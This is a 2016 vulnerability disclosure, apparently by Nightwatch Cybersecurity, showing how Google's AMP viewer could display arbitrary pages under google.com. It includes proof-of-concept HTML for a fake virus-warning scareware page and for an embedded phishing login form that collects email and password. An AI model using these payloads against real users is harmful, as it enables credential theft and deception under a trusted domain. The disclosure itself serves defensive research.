Overview
It is possible to use a flaw in Google.com to host malicious content. However, such content is not able to interact with anything on Google.com domain itself.
Details
Google’s main website provides a subsite for displaying mobile-optimized pages published using a special subset of HTML called AMP. The current implementation can display any AMP page on the Internet without checking content. The URL is as follows:
where XXXX is the URL of the site. This ONLY works on mobile devices and can be simulated using Chrome’s developer tools, but on desktop browsers, it will redirect to the page itself (as described in our earlier post). Here is a real working example:
This, however, can be used to display malicious content. Due to the way AMP is designed, AMP pages are not allowed to have Javascript, or “javascript:” URLs. They can, however, have URLs that lead to the Google Play store or iTunes. This can be leveraged to fool users into installing apps they don’t need — all on Google.com. Here is an example screenshot — note the URL and that a valid Google.com certificate is used. The link goes to the Google play store.
Source code - BODY tag only, rest is standard AMP HTML (see here):
<body><amp-img src=”glogo.jpg” alt=”logo” height=”200px” width=”300px”></amp-img> <h3>We have scanned your phone and found it to be infected with a virus. To clean your off, please click on the link below</h3> <p><a href=”https://play.google.com/store/apps/details?id=com.cleanmaster.mguard&hl=en">Clean My Phone</a></p></body>
Taking this a step further, while AMP does not allow forms and Javascript in the main page, it does allow Javascript and forms in an iframe, as long as that iframe is at least 75% down from the top of the page. This can be used to do the following — embedding a malicious login form inside an iframe which then can be used to steal people’s Google account credentials. Example screenshot and source below — this is not styled since it is a POC.
Main page BODY:
<body> <amp-img src=”glogo.jpg” alt=”logo” height=”300px” width=”300px”></amp-img> <amp-img src=”glogo.jpg” alt=”logo” height=”300px” width=”300px”></amp-img> <h3>You have logged out of your account, please login again below</h3> <amp-iframe width=”300px” height=”300px” sandbox=”allow-scripts allow-forms” layout=”responsive” frameborder=”0" src=”iframe.html"> </amp-iframe> </body>
Iframe Source:
<!doctype html> <html> <head> <meta charset=”utf-8"> <title>Test1</title> </head> <body> <form action=”form.py”> Email: <input type=”text” name=”email”/><br/> Password: <input type=”password” name=”password”/><br/> <input type=”submit”/> </form> </body> </html>
Vendor Response
The vendor has communicated that they do not consider this to be a security issue
References
- Google Security CID: 8–1639000011264
- AMP site: https://www.ampproject.org/
Credits
Researched and written by Yakov Shafranovich.
Timeline
2016–04–12: Vendor notified
2016–04–13: Vendor response
2016–04–13: Public disclosure
Nightwatch Cybersecurity 
